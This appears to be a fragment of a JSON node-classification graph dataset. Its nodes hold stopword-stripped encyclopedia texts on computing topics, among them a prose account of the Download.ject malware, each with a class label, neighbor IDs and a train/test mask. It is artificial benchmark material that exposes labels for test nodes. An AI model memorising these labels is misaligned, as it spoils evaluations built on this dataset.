system intended source used create end product packages installing port first creates package installs ports made makefile text files descriptions installation messages patches required adjust program work openbsd packing list listing files included packages ports tree uses set standard makefiles shared source tree provide bulk functionality shared infrastructure includes many utility functions port developers means ports often made simply late october 2007 openbsd developer nikolay sturm announced -stable ports tree considered unmaintained due lack resources effectively forced users run -current ports/base tree order keep security updates 2009 decided revive -stable ports tree supervision robert nagy jasper lievisse adriaanse two unofficial web-sites listing openbsd ports packages",
    "neighbors": [
      6657,
      10760,
      8213,
      6680,
      9245,
      5155,
      1574,
      5670,
      7722,
      5677,
      10817,
      3667,
      6227,
      8280,
      1637,
      9324,
      8305,
      1138,
      2168,
      7293,
      6797,
      2193,
      10900,
      10394,
      4775,
      6828,
      1718,
      5819,
      190,
      4302,
      2259,
      6361,
      8413,
      741,
      10469,
      231,
      2281,
      6393,
      8954,
      11525,
      7435,
      7947,
      9487,
      2321,
      1813,
      5397,
      6935,
      8476,
      10022,
      6446,
      7983,
      1842,
      823,
      2872,
      3918,
      4951,
      8539,
      9564,
      2401,
      1379,
      9063,
      8554,
      7534,
      10096,
      8068,
      3462,
      3975,
      8582,
      3465,
      2955,
      9125,
      11184,
      6583,
      8631,
      10172,
      9151,
      8644,
      9671,
      5578,
      5067,
      5070,
      463,
      11221,
      2010,
      7140,
      6119,
      5096,
      8683,
      5612,
      1522,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 789,
    "label": 2,
    "text": "IBM_CP-40:ibm cp-40 cp-40 research precursor cp-67 turn part ibm then-revolutionary cp -67 /cms – virtual machine/virtual memory time-sharing operating system ibm system/360 model 67 parent ibm vm family cp-40 ran multiple instances client operating systems – particularly cms cambridge monitor system built part effort like cp-67 cp-40 first version cms developed ibm cambridge scientific center csc staff working closely mit researchers project mac lincoln laboratory cp-40/cms production use began january 1967 cp-40 ran unique specially modified ibm system/360 model 40 cp-40 one-off research system declared goals however also important unofficial mission demonstrate ibm commitment capability supporting time-sharing users like mit cp-40 successor achieved goals technical social standpoints – helped prove viability virtual machines establish culture time-sharing users launch remote computer services industry however project became embroiled internal ibm political war time-sharing versus batch processing failed win hearts minds academic computer science community ultimately turned away ibm systems like multics unix tenex various dec operating systems ultimately however virtualization concepts developed cp-40 project bore fruit diverse areas remain important today cp-40 first operating system implemented complete virtualization i.e provided virtual machine environment supporting aspects target computer system s/360-40 s/360 operating systems could installed tested used stand-alone machine cp-40 supported fourteen simultaneous virtual machines virtual machine ran problem state – privileged instructions i/o operations caused exceptions caught control program simulated similarly references virtual memory locations present main memory cause page faults handled control program rather reflected virtual machine details implementation found cp/cms architecture basic architecture user interface cp-40 carried forward cp-67/cms evolved become ibm current vm product line model 67 available building cp-40 custom virtual memory device based associative memory cat box designed built csc involved hardware microcode changes specially modified system/360 model 40 changes gave unit technology needed full virtualization system/360 hardware modified model 40 influenced design forthcoming model 67 intended meet needs community time-sharing users notably mit project mac bell laboratories – though sites became notable ibm sales failures three distinct virtual memory systems implemented ibm period systems different bore family resemblance cp-40 cat box key milestone pugh et al cite ieee paper cp-40 virtual memory hardware states unique included parallel-search register bank speed dynamic address translation funds supplied cambridge ibm engineer ... built 64-register associative memory integrated 360/40 one-of-a-kind result shipped cambridge early 1966 important note although virtualization support explicit goal csc modified model 40 apparently case original model 67 design fact virtualization capabilities ultimately implemented -67 thus enabled success cp-67/cms speaks tenacity persuasivness csc team cms first built 1964 csc run 'client operating system cp-40 cms project leader john harmon although s/360 operating system could run cp-40 virtual machine decided new simple single-user interactive operating system would best supporting interactive time-sharing users would avoid complexity overhead running multi-user system like ctss contrast ibm os/mvt-tso successors – essentially time-sharing operating system running single task ibm batch operating system cms interactive user gets private virtual machine september 1965 many important cms design decisions already made radical departures difficult file naming job control via jcl requirements ibm real operating systems concepts goals operating systems vendors control data corporation dec. cms file system design flat directory structure kept deliberately simple creasy notes structure multiple disks single directory chosen simple useful multi-level linked directories files stored common areas design trend began simplified design components cms reduce implementation complexity application programs running cms executed within address space accessed system services cms file system simple programming interface cms nucleus resided low memory within cms virtual machine variety system calls provided would familiar current cms programmers since applications ran cms virtual machine could potentially misbehave overwriting cms data using privileged instructions taking actions could take crash virtual machine course could affect virtual machines mutually isolated could damage underlying control program unlike operating systems cp crashes rarely stemmed application errors – thus relatively rare following notes provide brief quotes primarily pugh varian creasy see references illustrating development context cp-40 direct quotes rather paraphrases provided authors perspectives color interpretations also see history cp/cms additional context",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      4637,
      3615,
      9762,
      5158,
      7217,
      10803,
      7733,
      9784,
      10809,
      573,
      576,
      9811,
      10333,
      97,
      9829,
      6248,
      8298,
      6772,
      7285,
      9335,
      2168,
      1147,
      2172,
      3197,
      1150,
      11390,
      2179,
      10883,
      3725,
      6797,
      9361,
      9366,
      6296,
      9370,
      7325,
      9887,
      7848,
      8879,
      3248,
      6837,
      7349,
      1219,
      8388,
      6342,
      9932,
      5840,
      1235,
      7382,
      8410,
      1253,
      5363,
      2811,
      3323,
      2813,
      9468,
      5378,
      10499,
      1804,
      273,
      11539,
      5397,
      3359,
      10016,
      2345,
      1323,
      7983,
      7477,
      823,
      10040,
      4409,
      7483,
      8509,
      11075,
      4423,
      5457,
      11601,
      7507,
      10590,
      863,
      868,
      3429,
      8551,
      5492,
      8063,
      6529,
      4996,
      394,
      3978,
      7053,
      8077,
      7057,
      11667,
      11673,
      8092,
      6557,
      421,
      11184,
      5562,
      6075,
      6078,
      9151,
      8136,
      6128,
      5619,
      10235
    ],
    "mask": "None"
  },
  {
    "node_id": 790,
    "label": 4,
    "text": "Download.ject:download.ject computing download.ject also known toofer scob malware program microsoft windows servers installed insecure website running microsoft internet information services iis appends malicious javascript pages served site download.ject first noted case users internet explorer windows could infect computers malware backdoor key logger merely viewing web page came prominence widespread attack starting june 23 2004 infected servers included several financial sites security consultants prominently started promoting use opera mozilla firefox instead ie wake attack download.ject virus worm spread june 23 attack hypothesised put place automatic scanning servers running iis hackers placed download.ject financial corporate websites running iis 5.0 windows 2000 breaking using known vulnerability patch existed vulnerability many administrators applied attack first noticed june 23 although researchers think may place early june 20 download.ject appended fragment javascript web pages compromised servers page server viewed internet explorer ie windows javascript would run retrieve copy one various backdoor key logging programs server located russia install user machine using two holes ie — one patch available without vulnerabilities present versions ie windows except version included windows xp service pack 2 beta testing time server browser flaws exploited attack notable however combining two placed upon popular mainstream websites although list affected sites released network compromised sites used attack reportedly numbering thousands far previous compromised network microsoft advised users remove infection browse security settings maximum security experts also advised switching javascript using web browser internet explorer using operating system windows staying internet altogether particular attack neutralised june 25 server download.ject installed backdoor shut microsoft issued patch windows 2000 2003 xp july 2 although sizable attack compared email worms time fact almost existing installations ie — 95 web browsers use time — vulnerable latest series ie holes leaving underlying operating system vulnerable caused notable wave concern press even business press started advising users switch browsers despite then-prerelease windows xp sp2 invulnerable attack",
    "neighbors": [
      5765,
      3462,
      8584,
      9609,
      6028,
      6797,
      8978,
      790,
      6171,
      7713,
      11683,
      10026,
      10282,
      7983,
      11060,
      10808,
      7739,
      9167,
      9808,
      4439,
      11223,
      8281,
      2777,
      7515,
      603,
      4956,
      107,
      9328,
      2041
    ],
    "mask": "Test"
  },
  {
    "node_id": 791,
    "label": 9,
    "text": "Nyquist_(programming_language):nyquist programming language nyquist programming language sound synthesis analysis based lisp programming language extension xlisp dialect lisp named harry nyquist nyquist programmer designs musical instruments combining functions call upon instruments generate sound typing simple expression programmer combine simple expressions complex ones create whole composition also generate various kinds musical non-musical sounds nyquist interpreter read write sound files midi files adagio text-based music score files many platforms also produce direct audio output real time nyquist programming language also used write plug-in effects audacity digital audio editor one notable difference nyquist traditional music-n languages nyquist segregate synthesis functions see unit generator scoring functions example csound actually two languages one creating orchestras writing scores nyquist two domains combined nyquist runs linux unix environments mac os microsoft windows nyquist programming language interpreter written roger dannenberg carnegie mellon university support yamaha corporation ibm",
    "neighbors": [
      10752,
      11269,
      6797,
      2062,
      8728,
      6810,
      10012,
      3869,
      8226,
      5031,
      823,
      6840,
      6717,
      9023,
      5569,
      8262,
      11218,
      10712,
      3675,
      7392,
      10083,
      6502,
      2666,
      5360,
      5361,
      8435,
      5492,
      3446,
      9210,
      3323,
      7550
    ],
    "mask": "Test"
  },
  {
    "node_id": 792,
    "label": 2,
    "text": "Epoll:epoll codice_1 linux kernel system call scalable i/o event notification mechanism first introduced version 2.5.44 linux kernel mainline function monitor multiple file descriptors see whether i/o possible meant replace older posix codice_2 codice_3 system calls achieve better performance demanding applications number watched file descriptors large unlike older system calls operate n time codice_1 operates 1 time codice_1 similar freebsd codice_6 consists set user-space functions taking file descriptor argument denoting configurable kernel object cooperatively operate codice_1 used red-black tree rb-tree data structure keep track file descriptors currently monitored creates codice_1 object returns file descriptor codice_9 parameter allows epoll behavior modified one valid value codice_10 codice_11 older variant codice_12 deprecated linux kernel version 2.6.27 glibc version 2.9 controls configures file descriptors watched object events codice_13 add modify delete waits events registered codice_14 least one occurs timeout elapses returns occurred events codice_15 codice_16 codice_1 provides edge-triggered level-triggered modes edge-triggered mode call codice_18 return new event enqueued codice_1 object level-triggered mode codice_18 return long condition holds instance pipe registered codice_1 received data call codice_18 return signaling presence data read suppose reader consumed part data buffer level-triggered mode calls codice_18 return immediately long pipe buffer contains data read edge-triggered mode however codice_18 return new data written pipe bryan cantrill pointed codice_1 mistakes could avoided learned predecessors input/output completion ports event ports solaris kqueue however large part criticism addressed codice_1 codice_27 codice_28 options codice_27 added version 2.6.2 linux kernel mainline released february 2004. codice_28 added version 4.5 released march 2016",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      8275,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      6813,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      2294,
      8439,
      2809,
      4360,
      1291,
      4367,
      10016,
      295,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5457,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8599,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 793,
    "label": 4,
    "text": "Arbor_Networks:arbor networks arbor networks software company founded 2000 based burlington massachusetts united states sells network security network monitoring software used – according company claims – 90 internet service providers company products used protect networks denial-of-service attacks botnets computer worms efforts disable network routers company founded 2000 co-founders farnam jahanian rob malan spun research university michigan sponsored darpa cisco intel joined students jonathan arnold matthew smart jonathan poland entrepreneurs ted julian dug song make founding team company raised 11 million round venture capital later august 2002 company raised another 22 million second round venture capital led thomas weisel venture partners participants included battery ventures cisco systems among others january 2008 arbor acquired ellacoya networks company provides broadband traffic shaping products acquisition expected increase total addressable market tam arbor 750 million 2008 1.5 billion end 2009 march 2009 arbor worked 100 isps create new network monitoring system called atlas 2.0 october 2009 company estimated google paid almost nothing youtube bandwidth noting google probably used dark fibre instead run website august 31 2010 tektronix communications announced completed acquisition arbor networks upon completion acquisition arbor networks joins danaher corporation portfolio communications enterprise companies includes tektronix communications september 3 2013 arbor networks announced acquired privately held packetloop leader security analytics based sydney australia arbor strategic partnerships cisco ibm juniper networks addition headquarters burlington massachusetts company also offices ann arbor michigan london singapore wired stated due popularity arbor software among isps company likely knows internet ebbs flows anyone outside national security agency arbor part netscout systems part acquisition fluke tektronix communications tekcomms vss 2015 danaher",
    "neighbors": [
      5472,
      2409,
      939,
      5547,
      9259,
      10283,
      7887,
      6834,
      4883,
      2041,
      3323,
      3581
    ],
    "mask": "Test"
  },
  {
    "node_id": 794,
    "label": 4,
    "text": "Wireless_intrusion_prevention_system:wireless intrusion prevention system computing wireless intrusion prevention system wips network device monitors radio spectrum presence unauthorized access points intrusion detection automatically take countermeasures intrusion prevention primary purpose wips prevent unauthorized network access local area networks information assets wireless devices systems typically implemented overlay existing wireless lan infrastructure although may deployed standalone enforce no-wireless policies within organization advanced wireless infrastructure integrated wips capabilities large organizations many employees particularly vulnerable security breaches caused rogue access points employee trusted entity location brings easily available wireless router entire network exposed anyone within range signals july 2009 pci security standards council published wireless guidelines pci dss recommending use wips automate wireless scanning large organizations wireless intrusion detection system wids monitors radio spectrum presence unauthorized rogue access points use wireless attack tools system monitors radio spectrum used wireless lans immediately alerts systems administrator whenever rogue access point detected conventionally achieved comparing mac address participating wireless devices rogue devices spoof mac address authorized network device new research uses fingerprinting approach weed devices spoofed mac addresses idea compare unique signatures exhibited signals emitted wireless device known signatures pre-authorized known wireless devices addition intrusion detection wips also includes features prevent threat automatically automatic prevention required wips able accurately detect automatically classify threat following types threats prevented good wips wips configurations consist three components simple intrusion detection system single computer connected wireless signal processing device antennas placed throughout facility huge organizations multi network controller provides central control multiple wips servers soho smb customers functionality wips available single box wips implementation users first define operating wireless policies wips wips sensors analyze traffic air send information wips server wips server correlates information validates defined policies classifies threat administrator wips notified threat policy set accordingly wips takes automatic protection measures wips configured either network implementation hosted implementation network wips implementation server sensors console placed inside private network accessible internet sensors communicate server private network using private port since server resides private network users access console within private network network implementation suitable organizations locations within private network hosted wips implementation sensors installed inside private network however server hosted secure data center accessible internet users access wips console anywhere internet hosted wips implementation secure network implementation data flow encrypted sensors server well server console hosted wips implementation requires little configuration sensors programmed automatically look server internet secure tls connection large organization locations part private network hosted wips implementation simplifies deployment significantly sensors connect server internet without requiring special configuration additionally console accessed securely anywhere internet hosted wips implementations available on-demand subscription-based software service model hosted implementations may appropriate organizations looking fulfill minimum scanning requirements pci dss",
    "neighbors": [
      4163,
      4517,
      9640,
      2409,
      10092,
      9968,
      467,
      7411,
      7222,
      2430,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 795,
    "label": 3,
    "text": "Daniel_Slotnick:daniel slotnick daniel leonid slotnick 1931–1985 mathematician computer architect slotnick papers published john cocke 1958 discussed use parallelism numerical calculations first time later served chief architect illiac iv supercomputer principal investigator darpa contract early 1970s produced illiac iv arpanet fairly large operation building campus uiuc originally called center advanced computation astronomy building illiac iv constructed burroughs corporation using special chips made fairchild semiconductor campus unrest due vietnam war mansfield amendments illiac iv completed installed ames research center instead uiuc slotnick darpa contract renewed 1985 ida nsa formed supercomputing research facility dc area slotnick widow donated library 1987 first issue journal supercomputing contained tribute slotnick development arpanet took place mit lincoln labs bbn technologies however planned illiac iv would network work funded slotnick darpa contract example standard character set established also purdy polynomial secure hash function protect passwords arpanet ironically illiac iv project moved ames research center computer could accessed telephone 415 329-0740 awarded afips prize 1962 elected ieee fellow 1976",
    "neighbors": [
      9932,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 796,
    "label": 4,
    "text": "Project_Safe_Childhood:project safe childhood project safe childhood psc department justice initiative launched 2006 aims combat proliferation technology-facilitated sexual exploitation crimes children psc coordinates efforts various federal state local agencies organizations protect children investigating prosecuting online sexual predators psc partners include internet crimes children icac task forces fbi u.s postal inspection service immigration customs enforcement u.s marshals service national center missing exploited children state local law enforcement officials u.s. attorney ’ district",
    "neighbors": [
      10545
    ],
    "mask": "Test"
  },
  {
    "node_id": 797,
    "label": 9,
    "text": "TI-BASIC:ti-basic ti-basic official name basic-like language built texas instruments ti graphing calculators ti-basic language family three different incompatible versions released different products ti rarely refers language name name ti-basic used developer documentation many applications convenient way program ti calculator since capability write programs ti-basic built-in assembly language often referred asm also used c compilers exist translation assembly tigcc motorola 68000 68k based calculators sdcc zilog z80 based calculators however cross-compilers allowing on-calculator programming ti-basic considerably slower assembly language interpreted making better suited writing programs quickly solve math problems perform repetitive tasks rather programming games graphics-intensive applications math instruction books even provide programs ti-basic usually widespread variant used ti-82/83/84 series although somewhat minimalist compared programming languages used computers ti-basic nonetheless important factor programming community ti graphing calculators required advanced mathematics classes many high schools universities ti-basic often provides first glimpse many students world programming syntax versions ti-basic somewhat different typical basic implementations language basic structured programming capabilities makes limited use allowance white space indentation also dependent somewhat non-standard character set specific characters assignment right sto arrow readily available character sets square cube roots mathematical symbols well tokenized entry storage keywords statements begin colon also functions statement separator within lines ti-83/84 models closing parentheses brackets braces quotes optionally omitted end line sto token order save space although sometimes better left example ti 83/84 models loop function runs much slower without closing parentheses certain circumstances expressions use infix notation standard operator precedence many statements demand arguments parentheses similar syntax used mathematical functions syntax assignment copying data variable unusual respect conventional programming languages computers rather using basic-like let statement equal sign algol-like codice_1 operator ti-basic uses right-arrow sto operator syntax source → destination similar several japanese calculators casio canon sharp often employed similar syntax ever since first mass market japanese alphanumerical calculators appeared late 1970s early 1980s control flow statements include if-then-else blocks loops loops repeat loops though switch statements main control flow statements unusual high level language ti-basic implementations include increment skip greater ds decrement skip less statements constructs generally associated assembly languages sections programs labeled however particularly z80 models labels function destinations goto statements codice_2 functions rather program block labels availability functions subroutines depends implementation versions available ti-82-descended calculators even support gosub-like function though possible call programs within share variables programs ti-89/92-based designs access shared functions essentially programs capable returning value ti-basic strongly dynamically-typed language available data types differ considerably 68k z80 versions possible create user-defined data types without using library written assembly lists often used replacement structs data types directly manipulated include data types directly manipulated typing name line would result error include flexibility use variables varies widely calculator model ti-83/84 programmer create lists whose names five characters data types limited 27 real complex variables number predefined variable names types e.g. matrices one ten variables codice_16-codice_17 ti-83/84 certain variables codice_34 finance variables fixed addresses ram making much faster access 27 letter variables codice_34 acts special variable containing result last evaluated code line variable still evaluated contents stored codice_34 result codice_34 reevaluated frequently often used store temporary calculations hold values would otherwise slow access items list variables global contrast 68k calculators allow variable names eight alphanumeric including greek characters furthermore variables grouped folders made local program declaring codice_38 statement z80 programmers often start lines double quotation mark denote comment lines starting actually executed changing codice_34 variable affect anything performance unless codice_34 read immediately afterwards 68k calculators allow programs include single-line comments using © comment symbol comment appears first line prgm statement displayed status bar program selected catalog comments often used document names types parameters 68k interpreter built feature store number space characters beginning line allows indentation z80 version ti-basic makes explicit functions like 68k impossible however variables global functions emulated setting variables similar arguments calling another program return values exist codice_41 statement stops current program continues program called 68k version ti-basic allows creating user-defined functions functions syntax programs except use codice_42 ... codice_43 keywords instead codice_44 ... codice_45 allowed use instructions perform i/o modify non-local variables call programs however functions still non-pure call built-in functions codice_46 codice_47 codice_48 functions return value absence explicit codice_41 statement last expression evaluated third-party applications chronological order omnicalc xlib celtic doors cs overloaded ti-basic functions z80 calculators provide additional language functionality third-party libraries overload sum real det identity functions handled interpreted respective applications among extra functions fast shape-drawing routines sprite tilemap tools program vat modification access abilities gui construction features much ordinarily restricted use assembly programmers functions require application like doors cs 7.0 present user calculator sometimes considered detraction use libraries following programs executed display phrase codice_50 lists many possible names allows many programs manipulate many lists without overriding previous data lists ti-82 custom names l l preprogrammed ti-85 ti-86 ability handle variable name subscripts ti-81 completely unable handle lists lists used numerous built-in ti-basic functions calculating statistics including various regression analyses called inside programs however still show info pausing execution store specific results variables recursion possible program called within within another program example used compute factorials order work codice_51 parameter factorial function codice_3 must equal 1 68k series makes distinction programs functions functions like programs except allow statements perform i/o including modifying non-local variables return value absence explicit codice_41 statement last expression evaluated growth hobbyist graphing calculator community 1990s brought sharing collaboration including need share ti-basic code mailing lists discussion forums first done typing ti-basic code calculator screen computer hand conversely entering programs manually calculators ti-basic programs stored tokenized format edited using standard computer text editors calculator programming community matured need automated converter arose format computer-stored ti-basic programs generated texas instruments ti-graphlink application eventually decoded third-party tools created manipulate files ti created basic editor included certain releases ti-graphlink linking program gained widespread usage particular used custom character set display properly copied pasted fora 2005 joe penna created optibasic translator tool convert text ti-graphlink editor standard unicode project soon expanded include regex-based ti-basic optimizer independently christopher kerm martian mitchell cemetech began creating online converter extract plain-text later html bbcode-formatted contents tokenized ti-basic programs expanded include online program editor exporter ti-83 plus emulator sourcecoder project absorbed optibasic end 2005 major ti-basic editor currently use tokenide tokens created shaun merthsoft mcfall offline editor tokens import edit export ti-basic programs includes tools track program size correctness offers ancillary features sprite/image editor built around token definitions stored xml files intended extensible work user-specified token mapping programmes nsprire series well ti 92 plus voyage 200 calculators transferred saved flat clear text ansi/ascii/iso 8859-* format several ides ti calculator programming series textpad syntax definitions code snippets charts available ti calculators syntax definitions also converted format used zeus editor clear text format also used lua interpreter calculator independent project exists developing pc-side interpreter ti89-92-voyage 200 variant ti basic would allow programmes calculator run directly well combined programmes languages call interpreter interpreter uses standard input output error specifiable log configuration files console mode windows second programme replicate graphics used calculator would related way tk tools integrated tcl perl rexx c languages related project developing tk kind tool use vbscript source tool third tool integrates pc-side ti basic spreadsheet database programmes via vba wsh engines also envisioned project also involves calculator-side unix-style shell rexx perl interpreters fortran 77 interpreter well converters go back forth amongst various casio hp sharp texas instruments calculator programming languages various scripting languages",
    "neighbors": [
      5635,
      3718,
      8582,
      7691,
      1805,
      9997,
      6160,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      1952,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      11315,
      692,
      315,
      7355,
      7486,
      7870,
      4160,
      7616,
      4674,
      5059,
      966,
      10750,
      712,
      847,
      2383,
      1879,
      219,
      92,
      477,
      7772,
      479,
      11229,
      2915,
      9188,
      5733,
      7269,
      11243,
      9964,
      2541,
      8429,
      5747,
      759,
      6778,
      9463,
      2045,
      6910,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 798,
    "label": 2,
    "text": "Android_Marshmallow:android marshmallow android marshmallow codenamed android development sixth major version android operating system 13th version android first released beta build may 28 2015 officially released october 5 2015 nexus devices first receive update marshmallow primarily focuses improving overall user experience predecessor lollipop introduced new permissions architecture new apis contextual assistants first used new feature tap provide context-sensitive search results new power management system reduces background activity device physically handled native support fingerprint recognition usb-c connectors ability migrate data applications microsd card internal changes 16.9 devices accessing google play run android 6.0 single popular point release android android nougat oreo major releases 7.x 8.x larger install bases release internally codenamed macadamia nut cookie first developer preview build codenamed android unveiled released google i/o may 28 2015 nexus 5 nexus 6 smartphones nexus 9 tablet nexus player set-top box second developer preview released july 9 2015 third final preview released august 17 2015 along announcing android would titled android marshmallow september 29 2015 google unveiled launch devices marshmallow lg-produced nexus 5x huawei-produced nexus 6p alongside google pixel c tablet android 6.0 updates factory images nexus 5 6 7 2013 9 player released october 5 2015 older nexus devices including nexus 4 nexus 7 2012 nexus 10 receive official update october 14 2015 lg announced planned release marshmallow flagship lg g4 smartphone poland following week marking first third-party device receive update marshmallow android 6.0.1 software patch featuring security fixes support unicode 8.0 emoji although without supporting skin tone extensions human emoji return next alarm feature disturb mode released december 7 2015 new assist api allows information currently opened app including text screenshot current screen sent designated assistant application analysis processing system used google search app feature google tap allows users perform searches within context information currently displayed on-screen home button used android 5 show available apps home button used together voice command generate on-screen cards display information suggestions actions related content direct share allows share menus display recently used combinations contacts associated app direct targets adoptable storage allows newly inserted sd card secondary storage media designated either portable internal storage portable maintains default behavior previous android versions treating media secondary storage device storage user files storage media removed replaced without repercussions subject access restrictions apps designated internal storage storage media reformatted encrypted ext4 file system adopted operating system primary storage partition existing data including applications private data folders migrated external storage normal operation device becomes dependent presence media apps operating system functions function properly adopted storage device removed user loses access storage media adopted storage forgotten makes data permanently inaccessible samsung lg however removed ability use sd card internal storage galaxy s7 g5 devices samsung arguing feature could result unexpected losses data prevents users able transfer data using card android marshmallow introduces redesigned application permissions model apps longer automatically granted specified permissions installation time opt-in system used users prompted grant deny individual permissions ability access camera microphone application needed first time applications remember grants revoked user time new permissions model used applications developed marshmallow using software development kit sdk older apps continue use previous all-or-nothing approach permissions still revoked apps though might prevent working properly warning displayed effect marshmallow introduces new power management schemes known doze app standby running battery power device enter low-power state inactive physically handled state network connectivity background processing restricted high-priority notifications processed additionally network access apps deferred user recently interacted app apps may request permission exempt policies rejected google play store violation dangerous products policy core functionality adversely affected android marshmallow provides native support fingerprint recognition supported devices via standard api allowing third-party applications implement fingerprint-based authentication fingerprints used unlocking devices authenticating play store google pay purchases android marshmallow supports usb-c including ability instruct devices charge another device usb marshmallow also introduces verified links configured open directly specified application without user prompts user data apps targeting marshmallow automatically backed google drive wi-fi application receives 25 mb storage separate user google drive storage allotment marshmallow android compatibility definition document contains new security mandates devices dictating capable accessing encrypted data without affecting performance must enable secure boot device encryption default conditions comprise part specification must met order certified operating system able license google mobile services software requirement mandatory device encryption originally intended take effect lollipop delayed due performance issues",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      1083,
      10303,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      8812,
      8821,
      11391,
      11396,
      1670,
      7816,
      5262,
      10393,
      8858,
      7835,
      2208,
      673,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      2259,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      246,
      3836,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      288,
      2852,
      4901,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      424,
      937,
      5546,
      3499,
      6057,
      7595,
      2993,
      7103,
      2001,
      479,
      488,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 799,
    "label": 3,
    "text": "Accelerated_Graphics_Port:accelerated graphics port accelerated graphics port agp designed high-speed point-to-point channel attaching video card computer system primarily assist acceleration 3d computer graphics originally designed successor pci-type connections video cards since 2004 agp progressively phased favor pci express pcie mid-2008 pci express cards dominated market agp models available gpu manufacturers add-in board partners eventually dropping support interface favor pci express computers increasingly became graphically oriented successive generations graphics adapters began push limits pci bus shared bandwidth led development agp bus dedicated graphics adapters agp heavily based pci fact agp bus superset conventional pci bus agp cards must act pci cards primary advantage agp pci provides dedicated pathway slot processor rather sharing pci bus addition lack contention bus direct connection allows higher clock speeds second major change agp uses split transactions address data phases pci transaction separated card may send many address phases host processes order avoids long delays bus idle read operations third pci bus handshaking simplified unlike pci bus transactions whose length negotiated cycle-by-cycle basis using frame stop signals agp transfers always multiple 8 bytes long total length included request rather using irdy trdy signals word data transferred blocks four clock cycles 32 words agp 8× speed pauses allowed blocks finally agp allows optional agp 1.0 2.0 mandatory agp 3.0 sideband addressing meaning address data buses separated address phase use main address/data ad lines done adding extra 8-bit sideband address bus graphics controller issue new agp requests agp data flowing main 32 address/data ad lines results improved overall agp data throughput great improvement memory read performance makes practical agp card read textures directly system ram pci graphics card must copy system ram card video memory system memory made available using graphics address remapping table gart apportions main memory needed texture storage maximum amount system memory available agp defined agp aperture agp slot first appeared x86-compatible system boards based socket 7 intel p5 pentium slot 1 p6 pentium ii processors intel introduced agp support i440lx slot 1 chipset august 26 1997 flood products followed major system board vendors first socket 7 chipsets support agp via apollo vp3 sis 5591/5592 ali aladdin v. intel never released agp-equipped socket 7 chipset fic demonstrated first socket 7 agp system board november 1997 fic pa-2012 based via apollo vp3 chipset followed quickly epox p55-vp3 also based via vp3 chipset first market early video chipsets featuring agp support included rendition vérité v2200 3dfx voodoo banshee nvidia riva 128 3dlabs permedia 2 intel i740 ati rage series matrox millennium ii s3 virge gx/2 early agp boards used graphics processors built around pci simply bridged agp resulted cards benefiting little new bus improvement used 66 mhz bus clock resulting doubled bandwidth pci bus exclusivity examples cards voodoo banshee vérité v2200 millennium ii s3 virge gx/2 intel i740 explicitly designed exploit new agp feature set fact designed texture agp memory making pci versions board difficult implement local board ram emulate agp memory microsoft first introduced agp support windows 95 oem service release 2 osr2 version 1111 950b via usb supplement osr2 patch applying patch windows 95 system became windows 95 version 4.00.950 b first windows nt-based operating system receive agp support windows nt 4.0 service pack 3 introduced 1997 linux support agp enhanced fast data transfers first added 1999 implementation agpgart kernel module intel released agp specification 1.0 1997 specified 3.3 v signals 1× 2× speeds specification 2.0 documented 1.5 v signaling could used 1× 2× additional 4× speed 3.0 added 0.8 v signaling could operated 4× 8× speeds 1× 2× speeds physically possible specified available versions listed adjacent table agp version 3.5 publicly mentioned microsoft universal accelerated graphics port uagp specifies mandatory supports extra registers marked optional agp 3.0 upgraded registers include pcists capptr ncapid agpstat agpcmd nistat nicmd new required registers include apbaselo apbasehi agpctrl apsize nepg gartlo garthi various physical interfaces connectors see compatibility section official extension cards required electrical power longer slot additional pins purpose agp pro cards usually workstation-class cards used accelerate professional computer-aided design applications employed fields architecture machining engineering simulations similar fields 64-bit channel proposed optional standard agp 3.0 draft documents dropped final version standard standard allows 64-bit transfer agp8× reads writes fast writes 32-bit transfer pci operations number non-standard variations agp interface produced manufacturers agp cards backward forward compatible within limits 1.5 v-only keyed cards go 3.3 v slots vice versa though universal cards exist fit either type slot also unkeyed universal slots accept either type card agp universal card plugged-into agp universal slot 1.5 v portion card used cards like nvidia geforce 6 series except 6200 ati radeon x800 series keys 1.5 v prevent installed older mainboards without 1.5 v support last modern cards 3.3 v support nvidia geforce fx series fx 5200 fx 5500 fx 5700 fx 5800 fx 5900 fx 5950 geforce 6 series 6200 6600/6600 le/6600 gt ati radeon 9500/9700/9800 r350 9600/9800 r360 geforce 6200 geforce 6600 cards function agp 1.0 3.3v slots agp pro cards fit standard slots standard agp cards work pro slot motherboards equipped universal agp pro slot accept 1.5 v 3.3 v card either agp pro standard agp configuration universal agp card universal agp pro card cards incorrectly dual notches 